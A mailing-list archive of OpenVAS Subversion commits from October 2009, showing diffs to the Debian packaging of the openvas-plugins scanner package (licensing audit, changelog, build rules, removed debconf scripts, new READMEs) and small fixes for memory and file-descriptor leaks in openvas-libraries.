trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules Log: New package version (1.0.7) which tries to provide the openvas-nvt-sync script as well as some plugins. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO 2009-10-06 22:56:33 UTC (rev 5414) @@ -1,5 +1,6 @@ -- Update the debconf questions, they still talk about Nessus - --> update also the translations +- Update the plugins to the latest SVN release and change the package + numbering to reflect dates -- See if the debconf questions are still relevant for OpenVAS +- Find scripts refering to the Nessus Sript License and modify them + to refer to the GPL instead Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:56:33 UTC (rev 5414) @@ -1,3 +1,50 @@ +openvas-plugins-dfsg (1.0.7-2) unstable; urgency=low + + * Provide this package in Debian which includes the openvas-nvt-sync required + by openvas-server as well as some basic plugins (Closes: #532937, #534846) + * Restore audit, docs/, extras/ and scripts/ and review all components + to ensure they are free. The list of removed plugins is in + audit/removed-plugins, these include: + - NASL scripts without an explict license being refered in the header + - all of Gentoo plugins (glsa_2xxx) since the Gentoo advisories are + licensed under the Creative Commons by-sa version 2.0/version 2.5 + which is DFSG incompatible (only 3.0 is compatible) + * Add a audit/REMOVED-PLUGINs file listing the plugins removed + * Describe the status of this package in a new 'README' debian file + * Move rsync to Depends: since it is required by the openvas-nvt-sync + script and the purpose of this package is to provide it. + * Move again snmp to Recommends: as most networks use SNMP for + network management + * Create audit/generate-license-list script in order to generate a + list of all scripts based on license and make it easier to find + those scripts that do not have any license reference. + * Update George A. Theall's script describe-nessus-plugins to version 2.24, + dated june 2009) and removed 'update-nessus-plugins' since it's not + any longer useful. + * Restore packages' preinst/postrm which were lost in previous version + * Move the old packages config/templates/po to a separate directory. They are + not need currently (but might be useful in the future) + * Add a debian/TODO + * Add a Conflicts: on openvas-server (2.0.3-2 and previous) due to the + openvas-nvt-sync script + * Write a manual page for the openvas-nvt-sync script + + -- Javier Fernandez-Sanguino Pen~a Sun, 20 Sep 2009 02:13:11 +0200 + +openvas-plugins (1.0.7-1) unstable; urgency=low + + * New version based on latest plugins + * Update debian/copyright + * Move snmp to Suggests + * Removed audit/, docs/, extras/ and scripts/ + * Drop the following patches in debian/patches since they are already + included upstream: + 01_makefile_fix_distclean.dpatch + 02_adjust_examples.dpatch + 03_makefile_clean_space.dpatch + + -- Jan Wagner Fri, 18 Sep 2009 13:05:59 +0200 + openvas-plugins-dfsg (1.0.5-0.1) unstable; urgency=low * New upstream release Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 22:56:33 UTC (rev 5414) @@ -3,21 +3,29 @@ Priority: optional Maintainer: Debian OpenVAS Maintainers Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner , Joey Schulze -Build-Depends: debhelper (>= 5.0.0), dpatch, libopenvas1-dev (>= 1.0), openvas-server-dev (>= 1.0), libopenvasnasl1-dev, libgmp3-dev, libz-dev, libpcap0.8-dev | libpcap-dev, nmap, libnet1-dev, libgnutls-dev -Standards-Version: 3.8.0 -Vcs-Browser: http://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-plugins/packaging/debian/?root=openvas -Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-plugins/packaging/debian/ -Homepage: http://www.openvas.org +Build-Depends: debhelper (>= 5), dpatch, libopenvas2-dev, openvas-server-dev (>= 1.0), libopenvasnasl2-dev, libgmp3-dev, libz-dev, libpcap-dev, libnet1-dev, libgnutls-dev, libglib2.0-dev +Homepage: http://www.openvas.org/ +Vcs-Browser: https://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/?root=openvas +Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/ +Standards-Version: 3.8.3 Package: openvas-plugins-dfsg Section: net Architecture: any +Depends: ${shlibs:Depends}, ${misc:Depends}, rsync +Recommends: openvas-server (>= 1.0), nmap, smbclient, snmp +Suggests: openvas-client, pnscan, strobe, ike-scan Provides: openvas-plugins -Depends: ${shlibs:Depends}, debconf | debconf-2.0 -Recommends: wget, openvas-server (>= 1.0), nmap, snmp -Description: OpenVAS vulnerability tests - OpenVAS is a network security scanner. It makes possible to test the security - of remote hosts in an attempt to find vulnerable spots that should be fixed. +Conflicts: openvas-plugins, openvas-server (<= 2.0.3-2) +Description: remote network security auditor - plugins + The Open Vulnerability Assessment System is a modular security auditing + tool, used for testing remote systems for vulnerabilities that should be + fixed. . - This package contains the OpenVAS plugins, a set of security tests as well - as scripts to build additional plugins. + It is made up of two parts: a server, and a client. The server/daemon, + openvasd, is in charge of the attacks, whereas the client, + OpenVAS-Client, provides an X11/GTK+ user interface. + . + This package contains the DFSG-free OpenVAS plugins, a set of security tests + as well as scripts to build additional plugins. It also provides the + infrastructure for downloading updated plugins from OpenVAS. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright 2009-10-06 22:56:33 UTC (rev 5414) @@ -1,167 +1,128 @@ This package is based on the nessus-plugins package, which was debianized by Josip Rodin on 2 Oct 1999. -Original sources for this software can be found at: http://www.openvas.org/ +It was downloaded from http://www.openvas.org/ -This package is Copyright (C) 1998 - 2007 Renaud Deraison and others. -[ For specific (c) statements see the individual files. ] +Upstream Author: OpenVAS -This package also provides the update-nessus-plugins and -describe-nessus-plugin scripts (provided in the examples directory). -These are copyright (c) 2003, George A. Theall -and they were downloaded from -http://www.tifaware.com/perl/update-nessus-plugins/ -and -http://www.tifaware.com/perl/describe-nessus-plugin/ +Copyright holders: + * Renaud Deraison + * Per Bothner + * Gordon Matzigkeit + * Lukas Grunwald + * Jan-Oliver Wagner + * Michel Arboi / + * Copyright (C) 1998 - 2006 Tenable Network Security, Inc. + * Copyright (C) 2007, DN-Systems Enterprise Internet Solutions GmbH -These scripts are free software; you can redistribute it and/or modify it -under the same terms as Perl itself. + * For the describe-openvas-plugin + Copyright (c) 2003-2009, George A. Theall + For autoconfiguration files: + Copyright (C) 1992-2006 Free Software Foundation, Inc -Files in this package come from many different authors: + The following list includes all of the plugins writers and copyright + holders of NASL scripts under + the 'scripts/' directory: + Noam Rathaus + Patrik Karlsson + Chris Gragsone + David Maciejak + Ferdy Riphagen + Michael Meyer + Renaud Deraison + Charles Thier + Sebastian Andersson + Chris Foster + Josh Zlatin-Amishav + Lionel Cons + Matt Moore + Georges Dagousset + deepquest + Charles Thier + Paul Ewing + George A. Theall, + Vincent Renardias + John Lampe (j_lampe at bellsouth.net) + Gregory Duchemin + Brian Smith-Sweeney (brian at smithsweeney.com) + fr0stman + Alexis de Bernis + Mathieu Perrin + Matthew North < matthewnorth at yahoo.com > + Xue Yong Zhi + Javier Fernandez-Sanguino + Rick McCloskey + Carsten Koch-Mauthe + Chandan S + Justin Seitz + H D Moore + Orlando Padilla + Erik Tayler + Forrest Rae + Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com + Copyright (C) 2003 StrongHoldNet + Copyright (c) 2008 Tim Brown and Portcullis Computer Security Ltd - A. Tarasco research. - Adam Baldwin - Alexis de Bernis - Anthony R. Plastino III - Astharot - Audun Larsen - Axel Nennker - Bekrar Chaouki - Brian Smith-Sweeney - Chandan S - Chaouki BEKRAR - Charles Thier - Chris Sullo - Christoff Breytenbach - David Kyger - Davy Van De Moere - Douglas Minderhout - Eli Kara - Erik Anderson - Erik Stephens - Erik Tayler - Farhad Koosha - Felix Huber - Ferdy Riphagen - Filipe Custodio - Forrest Rae - Frank Berger - Geoff Humes - Geoffroy Raimbault - George A. Theall - Georges Dagousset - Giovanni Fiaschi - Gregory Duchemin - H D Moore - Haroon Meer - Hendrik Scholz - Holger Heimann - Holm Diening - Immo Goltz - Intranode - James W. Abendschan - Jan-Oliver Wagner - Jasmin Amidzic . - Jason Haar - Jason Lidow - Javier Fernandez-Sanguino Peña - Javier Munoz Mellid - Javier Olascoaga - Jeff Adams - John Lampe - Jon Passki - Joseph Mlodzianowski - Josh Zlatin-Amishav - Julio César Hernández - Justin Seitz - Jøséph Mlødzianøwski - K-Otik.com - Keith Young - Laurent Facq <@u-bordeaux.fr> - Laurent Kitzinger - Lionel Cons , CERN - Lukas Grunwald - Mathieu Meadele - Mathieu Perrin - Matt Moore - Matthew North < matthewnorth at yahoo.com > - Michael J. Richardson - Michel Arboi - Nicolas Gregoire - Noam Rathaus , Beyond Security Ltd. - Orlando Padilla - Pasi Eronen - Patrik Karlsson - Paul Ewing - Paul Johnston - Pavel Kankovsky - Pedro Antonio Nieto Feijoo - Prizm - Randy Matz - Renaud Deraison - Rick McCloskey - Roelof Temmingh - Rui Bernardino - Scott Adkins - Scott Shebby scotts at scanalert.com - Sebastian Andersson - Stefaan Van Dooren - Sullo - Sverre H. Huseby - Tarik El-Yassem - Thomas Reinke - Tim Brown - Tobias Glemser - Tom Ferris - Tomi Hanninen - Veerendra GG - Victor Kirhenshtein - Vincent Renardias - Vlatko Kosturjak - Xue Yong Zhi - Yoav Goldberg - Zorgon - altomo at digitalgangsters.net - chewkeong at security.org.sg - deepquest - fr0stman - tony at libpcap.net - visigoth +License: +The GPL2 (or later) license applies to most of this package contents (but see +below) --------------------------------------------------------------------------- - NASL Scripts --------------------------------------------------------------------------- + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. -All NASL scripts included in this release (unless noted -otherwise in the plugin itself, see below) are distributed -under the GNU General Public License version 2: + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. +On Debian systems, the complete text of the GNU General Public License +can be found in /usr/share/common-licenses/GPL-2 file. - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA - -On Debian systems, full text of the GNU GPL can always be -found in the /usr/share/common-licenses/GPL file. +The following contents are available through only a GPL2 license (not later +versions): + + - configure.in + - openvas-nvt-sync.in + - plugins/3com_hub/3com_hub.c + - plugins/find_service/find_service.c + - plugins/openvas_tcp_scanner/openvas_tcp_scanner.c + +This package also provides the describe-nessus-plugin scripts (provided in the +examples directory). This script is (c) 2003, George A. Theall and was +downloaded from http://www.tifaware.com/perl/describe-nessus-plugin/. +The license for this script is the following: + + These scripts are free software; you can redistribute it and/or modify it + under the same terms as Perl itself. + +-------------------------------------------------------------------------- + Plugins / Scripts +-------------------------------------------------------------------------- + +All of the C and NASL scripts included in this release (unless noted otherwise +in the plugin itself, see below) are distributed under the GNU General Public +License version 2. Whenever a plugin refers to the "Nessus Script License" it +refers to the GPL version 2 license. + The NASL plugins might include text provided from vendor advisories that are distributed under different license contents. Most notably: Debian advisories ----------------- -Debian advisories are (c) 1997-2006 Software in the Public Interest, Inc. -for more information see http://www.debian.org/license +Debian advisories are (c) 1997-2005 Software in the Public Interest, Inc. +for more information see http://www.debian.org/licens This material may be distributed only subject to the terms and conditions set forth in the Open Publication License, Draft v1.0 or later @@ -285,3 +246,47 @@ derivative of the work in any standard (paper) book form is prohibited unless prior permission is obtained from the copyright holder.' to the license reference or copy. + + +Other plugins/scripts +--------------------- + +The following plugins hold other free software licenses: + +netware_post_perl.nasl is (c) 2002 visigoth + + This script is distributed under a BSD style license + allowing free use and continued development provided + the above Copyright message remains. + +smtpscan.nasl is Copyright (c) 2002,2003 Julien Bordet + +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions +# are met: +# 1. Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# 2. Redistributions in binary form must reproduce the above copyright +# notice, this list of conditions and the following disclaimer in the +# documentation and/or other materials provided with the distribution. +# 3. All advertising materials mentioning features or use of this software +# must display the following acknowledgement: +# This product includes software developed and data gathered by +# Julien Bordet, Renaud Deraison and Michel Arboi, for smtpscan and +# Nessus projects + +www_fingerprinting_hmap.nasl is (C) 2003 Michel Arboi + +# +# Redistribution and use in source, with or without modification, are +# permitted provided that the following conditions are met: +# +# 1. Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# 2. All advertising materials mentioning features or use of this software +# must display the following acknowledgement: +# This product includes software developed and data gathered by +# Michel Arboi +# + Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/openvas-plugins.config (from rev 5408, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config) Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/openvas-plugins.postinst (from rev 5408, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst) Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/openvas-plugins.templates (from rev 5408, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates) Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/po (from rev 5408, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po) Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config 2009-10-06 22:56:33 UTC (rev 5414) @@ -1,60 +0,0 @@ -#!/bin/sh -e -# Config script for openvas-plugins -# (c) 2003-2007 Javier Fernández-Sanguino -# Some ideas stolen from the geneweb package (and contributed by -# Christian Perrier) - -. /usr/share/debconf/confmodule -db_version 2.0 || [ $? -lt 30 ] -db_title "OpenVAS plugins" - - -find_updated_plugs () { - DIST_PLIST=`mktemp` - ORIG_PLIST=`mktemp` - cat $OPENVASPLIST | sort > $DIST_PLIST - find $PLUGINDIR -maxdepth 1 -type f | sort > $ORIG_PLIST - comm -13 $DIST_PLIST $ORIG_PLIST - rm -f $ORIG_PLIST $DIST_PLIST - return 0 -} - -PLUGINDIR=/var/lib/openvas/plugins/ -OPENVASPLIST=/var/lib/dpkg/info/openvas-plugins.list -MAX_ENTRIES=5 -[ -d $PLUGINDIR ] && ( [ "$1" = "configure" ] || [ "$1" = "reconfigure" ] ) && { -# We need to remove _all_ the plugins in the previous installation -# otherwise there might be stuff which we do not want - - newplugs="`find_updated_plugs`" - if [ -n "$newplugs" ] ; then - countnewplugs="`echo $newplugs |wc -l`" - else - countnewplugs=0 - fi - if [ -n "$newplugs" ] || [ "$1" = "reconfigure" ] ; then - -# I'm not convinced that there is any need to list all the plugins -# which are new here. This question could even be asked regardless -# of wether there are new plugins or not... (jfs) -# if [ $countnewplugs -gt $MAX_ENTRIES ] ; then - # List should be limited to, say, 5 entries at most to avoid - # filling up the screen -# newplugs="`echo $newplugs |head -$MAX_ENTRIES`" -# newplugs="$newplugs (...)" -# fi -# newplugs=`echo $newplugs | perl -pe 's/\n/, /g'` -# db_subst openvas-plugins/remove_unknown newplugs "$newplugs" || true - -# This will give an indication of the stuff that will be removed - db_subst openvas-plugins/remove_unknown countnewplugs "$countnewplugs" || true -# Ask the question - db_input medium openvas-plugins/remove_unknown || true - fi -} - -#DEBHELPER# - -db_go - -exit 0 Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs 2009-10-06 22:56:33 UTC (rev 5414) @@ -1,3 +1,2 @@ -var/lib/openvas/.desc-plugins var/lib/openvas/plugins var/lib/openvas/plugins-factory Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst 2009-10-06 22:56:33 UTC (rev 5414) @@ -1,48 +0,0 @@ -#!/bin/sh -e -# Postinst script for openvas-plugins -# (c) 2003-2007 Javier Fernández-Sanguino - -. /usr/share/debconf/confmodule -db_version 2.0 -test $DEBIAN_SCRIPT_DEBUG && set -v -x - - -# Note, This is far from optimal and might take some time to run. -# (and we have to do it again since we cannot preserve it through -# configure/postinst calls) -find_updated_plugs () { - DIST_PLIST=`mktemp` - ORIG_PLIST=`mktemp` - cat $OPENVASPLIST | sort > $DIST_PLIST - find $PLUGINDIR -maxdepth 1 -type f | sort > $ORIG_PLIST - comm -13 $DIST_PLIST $ORIG_PLIST - rm -f $ORIG_PLIST $DIST_PLIST - return 0 -} - -PLUGINDIR=/var/lib/openvas/plugins/ -OPENVASPLIST=/var/lib/dpkg/info/openvas-plugins.list -if [ "$1" = "configure" ] && [ -d $PLUGINDIR ]; then - db_get openvas-plugins/remove_unknown || true - REMOVE="$RET" - if [ "$REMOVE" = "true" ] ; then - newplugs="`find_updated_plugs`" - if [ -n "$newplugs" ] ; then - echo $newplugs | xargs -r rm -f - fi - fi -fi - -# Revert the change introduced in 2.0.10a-4, since -# now all plugins are in /var/ -if [ -d /var/lib/openvas/.desc-plugins ] && \ - [ -d /var/lib/openvas/plugins ] ; then - [ -L /var/lib/openvas/plugins/.desc ] && rm -f /var/lib/openvas/plugins/.desc - if [ ! -e /var/lib/openvas/plugins/.desc ]; then - mv /var/lib/openvas/.desc-plugins /var/lib/openvas/plugins/.desc - fi -fi - -#DEBHELPER# - -exit 0 Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates 2009-10-06 22:56:33 UTC (rev 5414) @@ -1,12 +0,0 @@ -Template: openvas-plugins/remove_unknown -Type: boolean -Default: false -_Description: Remove unknown OpenVAS plugins? - The /var/lib/openvas/plugins directory includes some unknown plugins. This - is probably because you downloaded additional plugins into it (e.g. by - running openvas-update-plugins). You currently have ${countnewplugs} - plugin(s) which are not provided by this package. - . - Note: This will apply to all your new installations/upgrades of this package - until you reconfigure it. You should say 'No' if you plan to - use openvas-update-plugins in the future. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list 2009-10-06 22:56:33 UTC (rev 5414) @@ -1,4 +1 @@ -01_makefile_fix_distclean.dpatch -02_adjust_examples.dpatch -03_makefile_clean_space.dpatch - +10_fix_install_permissions.dpatch Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 22:56:33 UTC (rev 5414) @@ -2,7 +2,7 @@ # Derived from dh_make example. #export DH_VERBOSE=1 -#export DH_COMPAT=4 +#export DH_COMPAT=5 include /usr/share/dpatch/dpatch.make @@ -18,7 +18,8 @@ build: build-stamp build-stamp: config.status dh_testdir - $(MAKE) + $(MAKE) + ( cd audit && sh exclude-plugins >exclude-list ) touch $@ config.status: configure patch @@ -32,15 +33,23 @@ dh_testroot touch openvas.tmpl [ ! -f Makefile ] || $(MAKE) distclean + -rm -rf audit/exclude-list dh_clean build-stamp + [ ! -f libtool ] || rm -f libtool + [ ! -d bin/ ] || rm -rf bin/ install: build-stamp dh_testdir dh_testroot dh_clean -k $(MAKE) install prefix=$(tmp)/usr sysconfdir=$(tmp)/etc localstatedir=$(tmp)/var/run libdir=$(tmp)/var/lib - rm -rf $(tmp)/var/run +# After we install we remove the plugins we want to exclude and +# audit the remaining plugins + ( cd $(tmp)/var/lib/openvas/plugins ; cat $(CURDIR)/audit/exclude-list $(CURDIR)/audit/remove-list | xargs rm -f ) + ( cd audit && sh audit-plugins $(tmp)/var/lib/openvas/plugins ) +# If the audit passes we continue + binary-indep: # Nothing to do, no arch-indep packages here. @@ -49,9 +58,9 @@ dh_testroot dh_installdebconf dh_installdocs docs/plugins_api.txt - dh_installexamples extra/update-openvas-plugins \ - extra/describe-openvas-plugin - dh_installchangelogs + dh_installexamples extra/describe-openvas-plugin + dh_installchangelogs + dh_link ifeq "$(findstring nostrip,$(DEB_BUILD_OPTIONS))" "" dh_strip strip --strip-unneeded --remove-section=.comment --remove-section=.note \ @@ -59,7 +68,6 @@ endif dh_compress dh_fixperms - chmod -x $(tmp)/var/lib/openvas/plugins/*.nes dh_installdeb dpkg-shlibdeps -Tdebian/openvas-plugins.substvars \ $(tmp)/var/lib/openvas/plugins/*.nes From scm-commit at wald.intevation.org Wed Oct 7 00:57:41 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:57:41 +0200 (CEST) Subject: [Openvas-commits] r5415 - in trunk/openvas-libraries: . base misc nasl Message-ID: <20091006225741.5F31F861EAAA@pyrosoma.intevation.org> Author: timb Date: 2009-10-07 00:57:40 +0200 (Wed, 07 Oct 2009) New Revision: 5415 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/base/openvas_certificate_file.c trunk/openvas-libraries/misc/network.c trunk/openvas-libraries/misc/openvas_auth.c trunk/openvas-libraries/nasl/nasl_scanner_glue.c Log: Fixed a bunch of memory and resource leaks Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-06 22:56:33 UTC (rev 5414) +++ trunk/openvas-libraries/ChangeLog 2009-10-06 22:57:40 UTC (rev 5415) @@ -1,3 +1,9 @@ +2009-10-06 Tim Brown + + * misc/network.c, misc/openvas_auth.c, nasl/nasl_scanner_glue.c + base/openvas_certificate_file.c: Fixed a bunch of resource and memory + leaks. + 2009-10-06 Michael Wiegand Post-release version bump. Modified: trunk/openvas-libraries/base/openvas_certificate_file.c =================================================================== --- trunk/openvas-libraries/base/openvas_certificate_file.c 2009-10-06 22:56:33 UTC (rev 5414) +++ trunk/openvas-libraries/base/openvas_certificate_file.c 2009-10-06 22:57:40 UTC (rev 5415) @@ -130,6 +130,7 @@ //show_error(_("Error exporting key file: %s"), err->message); g_error_free(err); g_key_file_free(key_file); + close(fd); return FALSE; } Modified: trunk/openvas-libraries/misc/network.c =================================================================== --- trunk/openvas-libraries/misc/network.c 2009-10-06 22:56:33 UTC (rev 5414) +++ trunk/openvas-libraries/misc/network.c 2009-10-06 22:57:40 UTC (rev 5415) @@ -572,9 +572,10 @@ } -/* helper function copied from cli.c from GnuTLS - * Reads a file into a gnutls_datum - */ +/** helper function copied from cli.c from GnuTLS + Reads a file into a gnutls_datum + @todo Fix the resource leak of FILE *f + **/ static gnutls_datum load_file (const char *file) { Modified: trunk/openvas-libraries/misc/openvas_auth.c =================================================================== --- trunk/openvas-libraries/misc/openvas_auth.c 2009-10-06 22:56:33 UTC (rev 5414) +++ trunk/openvas-libraries/misc/openvas_auth.c 2009-10-06 22:57:40 UTC (rev 5415) @@ -153,6 +153,7 @@ g_free (file_name); if (error) { + g_free (hash); g_error_free (error); return 1; } @@ -162,6 +163,7 @@ if (*split == NULL || *seed_hex == NULL) { g_warning ("Failed to split auth contents."); + g_free (hash); g_strfreev (split); return -1; } Modified: trunk/openvas-libraries/nasl/nasl_scanner_glue.c =================================================================== --- trunk/openvas-libraries/nasl/nasl_scanner_glue.c 2009-10-06 22:56:33 UTC (rev 5414) +++ trunk/openvas-libraries/nasl/nasl_scanner_glue.c 2009-10-06 22:57:40 UTC (rev 5415) @@ -506,6 +506,7 @@ { nasl_perror(lexic, "script_get_preference_file_content: fstat(%s): %s\n", value, strerror(errno)); + close(fd); return NULL; } From scm-commit at wald.intevation.org Wed Oct 7 00:57:45 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:57:45 +0200 (CEST) Subject: [Openvas-commits] r5416 - trunk/openvas-packaging/openvas-plugins/debian/trunk/debian Message-ID: <20091006225745.DAB1E861EAAC@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 00:57:45 +0200 (Wed, 07 Oct 2009) New Revision: 5416 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/docs trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars Log: Added missing files for this release Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README 2009-10-06 22:57:40 UTC (rev 5415) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README 2009-10-06 22:57:45 UTC (rev 5416) @@ -0,0 +1,22 @@ + +Please note that the upstream maintainers no longer maintain this +package and request users to upgrade the plugins using the +'openvas-nvt-sync' program. + +This package provides a set of basic plugins as well as the 'openvas-nvt-sync' +program. Administrators should update their plugins right after installing this +package through the script. + +The set of plugins provided by this package might be useful for users +that are running OpenVAS in closed environments and without an Internet +connection (or in a network which has limited access to the Internet). However, +users are encouraged to download and install the full set since this package +might not be updated frequently enough. + +An out-of-date set of plugins (i.e. security checks) might lead to a "false +sense of security". There might be open security holes in your network or +systems which openvas-server might not detect if using outdated plugins. + + +-- Sun Sep 20 04:42:18 CEST 2009 +Javier Fernandez-Sanguino Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source 2009-10-06 22:57:40 UTC (rev 5415) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source 2009-10-06 22:57:45 UTC (rev 5416) @@ -0,0 +1,6 @@ +The new original tarball can be created by removing the non-free plugins +listed in audit/REMOVED-PLUGINS file and removing the packaging/subdirectory + +For the rest we use dpatch for patch handling inside our package(s). Please +see /usr/share/doc/dpatch/README.source.gz (if you have dpatch installed) for +documentation on how to use dpatch. Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/docs =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/docs 2009-10-06 22:57:40 UTC (rev 5415) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/docs 2009-10-06 22:57:45 UTC (rev 5416) @@ -0,0 +1,2 @@ +debian/README +debian/README.source Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages 2009-10-06 22:57:40 UTC (rev 5415) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages 2009-10-06 22:57:45 UTC (rev 5416) @@ -0,0 +1 @@ +debian/openvas-nvt-sync.8 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 2009-10-06 22:57:40 UTC (rev 5415) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 2009-10-06 22:57:45 UTC (rev 5416) @@ -0,0 +1,58 @@ +.\" Hey, EMACS: -*- 